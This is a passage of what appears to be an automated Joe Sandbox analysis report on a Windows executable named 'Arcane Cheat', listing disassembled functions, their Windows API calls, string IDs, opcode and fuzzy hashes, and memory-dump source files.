                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0085118F,?,?,00000008,?,?,00850E2F,00000000), ref: 008513C1
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: gj
                                  • API String ID: 0-4203073231
                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0083EAC5), ref: 0083F068
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  APIs
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: 069fe5b2317c69f02eef69f4f1ba0b78627685e16eaeb272bede9a8b8399cc70
                                  • Instruction ID: 633aa3bf1f534bca179c044f73d007111ec0dff4442f0d26dd02431a0224606c
                                  • Opcode Fuzzy Hash: 069fe5b2317c69f02eef69f4f1ba0b78627685e16eaeb272bede9a8b8399cc70
                                  • Instruction Fuzzy Hash: CBA001B56416018B9B40CF7AAA0D2093AAEBA556D27198269B549C6160EA2885619F01
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                  • Instruction ID: 80f02c95f7a97447f780358e895aacbbc3cb5d087f3774431e5ec681f504bd97
                                  • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                  • Instruction Fuzzy Hash: 31621631604B899FCB29CF28C8906B9BBE1FF95304F14C56DD89BCB342E634A955CB94
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                  • Instruction ID: f778170f52cf42dec941ae45788b5585dd1acbcd0b0cbefed6bc64b6692e48ca
                                  • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                  • Instruction Fuzzy Hash: B86214B160878A9FC729CF28C8906A9FBE1FF95308F14866DD896C7742D730E955CB81
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                  • Instruction ID: 29eac6370df37fbebc45473dcaa6a10d18acbeb5140effa497a0b02f0bb280f7
                                  • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                  • Instruction Fuzzy Hash: B5524AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597245D734EA19CB86
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05d7728327efb60fb64c16d5fb4ef2529ed8c5c05caa50f59d9d0503ca688671
                                  • Instruction ID: 03cae7b4f35b3bae121d98e3045bd96dca6a58fb6d091da81de33a43130cd9bd
                                  • Opcode Fuzzy Hash: 05d7728327efb60fb64c16d5fb4ef2529ed8c5c05caa50f59d9d0503ca688671
                                  • Instruction Fuzzy Hash: AD12D1B16047069BC728DF2CC9D06B9B7E0FF94308F14892DE597C7A81E774A8A5CB85
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ebafe7eb01cf6e3e49ef2f166e4a77e58281b4f7d2851509f26dab25d630cd5
                                  • Instruction ID: 087ca7bd2da18cd1b713b61eae845beea1d7ec5064e0a01f20b52f6300a2eaea
                                  • Opcode Fuzzy Hash: 7ebafe7eb01cf6e3e49ef2f166e4a77e58281b4f7d2851509f26dab25d630cd5
                                  • Instruction Fuzzy Hash: 17F186726087259FC718CF29E48496EBBE1FFC9318F148A2EF495D7352D630E9858B42
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction ID: 0a1aa1169b53686b914e1c10f87ce5213ed21b88e39dcdb980ae14812d7bb347
                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction Fuzzy Hash: 97C1913621509B4ADF2D4639857413FFAA1FAA27B132A076DD5B2CB1C5FE30D528DE20
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  APIs
                                  • _swprintf.LIBCMT ref: 0082DABE
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                    • Part of subcall function 00831596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00860EE8,00000200,0082D202,00000000,?,00000050,00860EE8), ref: 008315B3
                                  • _strlen.LIBCMT ref: 0082DADF
                                  • SetDlgItemTextW.USER32(?,0085E154,?), ref: 0082DB3F
                                  • GetWindowRect.USER32(?,?), ref: 0082DB79
                                  • GetClientRect.USER32(?,?), ref: 0082DB85
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0082DC25
                                  • GetWindowRect.USER32(?,?), ref: 0082DC52
                                  • SetWindowTextW.USER32(?,?), ref: 0082DC95
                                  • GetSystemMetrics.USER32(00000008), ref: 0082DC9D
                                  • GetWindow.USER32(?,00000005), ref: 0082DCA8
                                  • GetWindowRect.USER32(00000000,?), ref: 0082DCD5
                                  • GetWindow.USER32(00000000,00000002), ref: 0082DD47
                                  Strings
                                  Similarity
                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                  • String ID: $%s:$CAPTION$d
                                  • API String ID: 2407758923-2512411981
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0084C277
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE2F
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE41
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE53
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE65
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE77
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE89
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE9B
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEAD
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEBF
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BED1
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEE3
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEF5
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BF07
                                  • _free.LIBCMT ref: 0084C26C
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084C28E
                                  • _free.LIBCMT ref: 0084C2A3
                                  • _free.LIBCMT ref: 0084C2AE
                                  • _free.LIBCMT ref: 0084C2D0
                                  • _free.LIBCMT ref: 0084C2E3
                                  • _free.LIBCMT ref: 0084C2F1
                                  • _free.LIBCMT ref: 0084C2FC
                                  • _free.LIBCMT ref: 0084C334
                                  • _free.LIBCMT ref: 0084C33B
                                  • _free.LIBCMT ref: 0084C358
                                  • _free.LIBCMT ref: 0084C370
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 279815418fb8211b3d4e4130ca069bdd11643ce8b837a7dd174122b86e2f1cd2
                                  • Instruction ID: c661e761582d06d499836dc4a3eac57b9083029830362eea7acb13ed426f69ee
                                  • Opcode Fuzzy Hash: 279815418fb8211b3d4e4130ca069bdd11643ce8b837a7dd174122b86e2f1cd2
                                  • Instruction Fuzzy Hash: 30318B32A0120EDFEB60AE7CD945B9AB3E9FF00310F10846AE448D7651DFB1AD408B25
                                  APIs
                                  • GetWindow.USER32(?,00000005), ref: 0083CD51
                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0083CD7D
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0083CD99
                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0083CDB0
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0083CDC4
                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0083CDED
                                  • DeleteObject.GDI32(00000000), ref: 0083CDF4
                                  • GetWindow.USER32(00000000,00000002), ref: 0083CDFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                  • String ID: STATIC
                                  • API String ID: 3820355801-1882779555
                                  • Opcode ID: e23398dfbe2b4448d1103e24eee0c42c1dc83d76578ee1051a33c514b437eb89
                                  • Instruction ID: ccaa8bb8103f02c4d54a2366dbb5584f87669786091de4d4576a44ef2dd4f148
                                  • Opcode Fuzzy Hash: e23398dfbe2b4448d1103e24eee0c42c1dc83d76578ee1051a33c514b437eb89
                                  • Instruction Fuzzy Hash: F81124321407117BE7206B68DC0EFAF369CFF80B41F004420FA42F10D2CAA4891587E2
                                  APIs
                                  • _free.LIBCMT ref: 00848EC5
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 00848ED1
                                  • _free.LIBCMT ref: 00848EDC
                                  • _free.LIBCMT ref: 00848EE7
                                  • _free.LIBCMT ref: 00848EF2
                                  • _free.LIBCMT ref: 00848EFD
                                  • _free.LIBCMT ref: 00848F08
                                  • _free.LIBCMT ref: 00848F13
                                  • _free.LIBCMT ref: 00848F1E
                                  • _free.LIBCMT ref: 00848F2C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: ee1deb601b233c52c3ae1c9ba02a9fcdc0bc5b50852dc1679b271bbf62d6f94b
                                  • Instruction ID: 420836036229a622f804f77c1f9d988bfd73d2893e250c3469614fe57492deee
                                  • Opcode Fuzzy Hash: ee1deb601b233c52c3ae1c9ba02a9fcdc0bc5b50852dc1679b271bbf62d6f94b
                                  • Instruction Fuzzy Hash: 1211A27690010DEFCB11EF98C842CDE3BA5FF04350B5180E5BA088B626DA31EB519F86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ;%u$x%u$xc%u
                                  • API String ID: 0-2277559157
                                  • Opcode ID: da7858ec71a079cda61ce0d7e79d07b392d149171d43332bc66de572abef3aae
                                  • Instruction ID: 3ef955062ab0ad50f6cc9e49abb913cc4f16ad67a259ce08783dc03e784e72b3
                                  • Opcode Fuzzy Hash: da7858ec71a079cda61ce0d7e79d07b392d149171d43332bc66de572abef3aae
                                  • Instruction Fuzzy Hash: B7F1E6716082606BDB15EE28A895BFE7795FFA0300F08456DFD85CB283DA6499C4C7A3
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083AD20
                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0083AD47
                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0083AD60
                                  • SetWindowTextW.USER32(?,?), ref: 0083AD71
                                  • GetDlgItem.USER32(?,00000065), ref: 0083AD7A
                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0083AD8E
                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0083ADA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                  • String ID: LICENSEDLG
                                  • API String ID: 3214253823-2177901306
                                  • Opcode ID: 9219484d1dfc69071bf428454f8fead6a81524a34326a3e0ce80c9a1bf3ddf21
                                  • Instruction ID: 63500b76a3a8f421c97a0ea66fea9a0714ae9d0a29af2e4e5abfe533c2dc7040
                                  • Opcode Fuzzy Hash: 9219484d1dfc69071bf428454f8fead6a81524a34326a3e0ce80c9a1bf3ddf21
                                  • Instruction Fuzzy Hash: 1F21F731240104BBE2265F39ED4DE3B3B6CFB8AB46F010414F684E64E0DB66A900D773
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00829448
                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0082946B
                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0082948A
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • _swprintf.LIBCMT ref: 00829526
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • MoveFileW.KERNEL32(?,?), ref: 00829595
                                  • MoveFileW.KERNEL32(?,?), ref: 008295D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                  • String ID: rtmp%d
                                  • API String ID: 2111052971-3303766350
                                  • Opcode ID: 996dcc4f6856e87af34b8547f5ae9aaa90444dd227933c22a3c4edbce5c9994c
                                  • Instruction ID: bfd2573cebddd45bfb91c4472624b61f889dde1c06a285be0f4d81d884613733
                                  • Opcode Fuzzy Hash: 996dcc4f6856e87af34b8547f5ae9aaa90444dd227933c22a3c4edbce5c9994c
                                  • Instruction Fuzzy Hash: 60414171901268A6CF21EB64AC85ADE73BCFF55380F0444E5F589E3142EB748BC9CB65
                                  APIs
                                  • __aulldiv.LIBCMT ref: 00830A9D
                                    • Part of subcall function 0082ACF5: GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00830AC0
                                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00830AD2
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00830AE3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830AF3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830B03
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00830B3D
                                  • __aullrem.LIBCMT ref: 00830BCB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                  • String ID:
                                  • API String ID: 1247370737-0
                                  • Opcode ID: 0f473d3bcd3b300d093d3211435fff3fb3668330d32d6351d69ed0ab447e9fab
                                  • Instruction ID: 58fe1c336e019600cf303e4881df05feb2299d77c4bdce988a3b8304b9c52a1f
                                  • Opcode Fuzzy Hash: 0f473d3bcd3b300d093d3211435fff3fb3668330d32d6351d69ed0ab447e9fab
                                  • Instruction Fuzzy Hash: C24128B14083069FC714DF64C88096BFBF8FB88755F004A2EF596D2650E738E549CB62
                                  APIs
                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0084F5A2,?,00000000,?,00000000,00000000), ref: 0084EE6F
                                  • __fassign.LIBCMT ref: 0084EEEA
                                  • __fassign.LIBCMT ref: 0084EF05
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0084EF2B
                                  • WriteFile.KERNEL32(?,?,00000000,0084F5A2,00000000,?,?,?,?,?,?,?,?,?,0084F5A2,?), ref: 0084EF4A
                                  • WriteFile.KERNEL32(?,?,00000001,0084F5A2,00000000,?,?,?,?,?,?,?,?,?,0084F5A2,?), ref: 0084EF83
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: d64e3b3f3192c81e4f2cba19e50e20e57f7b20c0005fab4f066ae3a7e9cd3c6a
                                  • Instruction ID: e2909ab7a137e082e27a2ec218a43fe8a49faa92313c45ab9f6dda5d44dde456
                                  • Opcode Fuzzy Hash: d64e3b3f3192c81e4f2cba19e50e20e57f7b20c0005fab4f066ae3a7e9cd3c6a
